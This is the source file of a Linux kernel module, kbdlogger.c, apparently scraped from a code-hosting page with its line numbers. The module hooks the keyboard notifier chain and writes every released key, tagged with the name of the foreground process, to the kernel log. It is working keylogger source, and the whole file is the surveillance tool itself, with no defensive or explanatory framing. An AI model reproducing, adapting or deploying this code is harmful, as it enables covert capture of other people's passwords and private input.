/
kbdlogger.c
99 lines (75 loc) · 2.8 KB
/
kbdlogger.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#include <linux/module.h>
#include <linux/init.h>
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/pid.h>
#include <linux/tty.h>
#include <linux/kd.h>
#include <linux/console_struct.h>
// Keyboard hook
#include <linux/keyboard.h>
#define BUFLEN 16
MODULE_LICENSE("GPL");
// Taken from: https://github.com/enaudon/abide/
char *ascii[128] = {
"", "<SOH>", "<STX>", "<ETX>", "<EOT>", "<ENQ>", "<ACK>", "<BEL>",
"<BS>", "<TAB>", "<LF>", "<VT>", "<FF>", "<CR>", "<SO>", "<SI>",
"<DLE>", "<DC1>", "<DC2>", "<DC3>", "<DC4>", "<NAK>", "<SYN>", "<ETB>",
"<CAN>", "<EM>", "<SUB>", "<ESC>", "<FS>", "<GS>", "<RS>", "<US>",
" ","!","\"","#","$","%","&","'","(",")","*","+",",", "-",".","/",
"0","1","2", "3","4","5","6","7","8","9",":",";","<", "=",">","?",
"@","A","B", "C","D","E","F","G","H","I","J","K","L", "M","N","O",
"P","Q","R", "S","T","U","V","W","X","Y","Z","[","\\","]","^","_",
"`","a","b", "c","d","e","f","g","h","i","j","k","l", "m","n","o",
"p","q","r", "s","t","u","v","w","x","y","z","{","|", "}","~","<DEL>"
};
int key_hook(struct notifier_block *nblock, unsigned long code, void *_param) {
struct keyboard_notifier_param *param = _param;
unsigned char type = param->value >> 8;
unsigned char val = param->value & 0x00ff;
struct pid *vt_pid = param->vc->vt_pid;
struct task_struct *task = NULL;
char buff[BUFLEN];
char proc_name[TASK_COMM_LEN];
// we only catch keys on the way up
if(param->down)
return NOTIFY_OK;
// convert pid to task struct
task = pid_task(vt_pid, PIDTYPE_PID);
if(task != NULL)
strlcpy(proc_name, task->comm, TASK_COMM_LEN);
// clear out the buffer
memset(buff, 0, BUFLEN);
// check for back space or delete first, then letters & numbers
if(param->value == 0xf07f) {
strlcpy(buff, "[BS]", BUFLEN);
} else if(param->value == 0xf116) {
strlcpy(buff, "[DEL]", BUFLEN);
} else if(type == 0xfb || type == 0xf0) {
strlcpy(buff, ascii[val], BUFLEN);
}
// printk(KERN_INFO "0x%08x 0x%08x 0x%08x\n", param->value, param->shift, param->ledstate);
// see if we got any translation, if not return
if(buff[0] == '\0' || buff[0] == '<')
return NOTIFY_OK;
printk(KERN_INFO "KBD_LGR\t%s: %s\n", proc_name, buff);
return NOTIFY_OK;
}
static struct notifier_block keyboard_nb = {
.notifier_call = key_hook
};
/* Module Init */
static int kit_init(void) {
printk(KERN_INFO "Module Init!\n");
// Mount keyboard hook
register_keyboard_notifier(&keyboard_nb);
return 0;
}
/* Module Exit */
static void kit_exit(void) {
printk(KERN_INFO "Module Exit!\n");
// Unmount keyboard hook
unregister_keyboard_notifier(&keyboard_nb);
}
module_init(kit_init);
module_exit(kit_exit);